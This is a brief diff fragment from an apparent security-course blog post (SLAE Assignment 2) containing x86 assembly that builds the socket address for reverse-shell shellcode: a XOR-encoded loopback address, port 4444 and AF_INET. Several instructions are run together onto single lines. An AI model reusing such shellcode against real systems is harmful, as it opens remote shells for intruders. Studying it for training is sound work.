h3ll0clar1c3/h3ll0clar1c3.github.io/_posts/2020-06-25-SLAE_Assignment_2.md

-        xor edi, 0xfeffff80; hex value of 127.0.0.1 XOR'd with 0xffffffff push edi	; push XOR'd value on the stack push word 0x5c11; port 4444 is set
-        ;inc ebx         ; ebx is increased with 1 from 0x1 push word 0x2   ; AF_INET = 2
+        xor edi, 0xfeffff80; hex value of 127.0.0.1 XOR'd with 0xffffffff push edi	; push XOR'd value on the stack push word 0x5c11; port 4444 is set push word 0x2   ; AF_INET = 2
         mov ecx, esp    ; pointer to the arguments push 0x16	; length of sockaddr struct, 16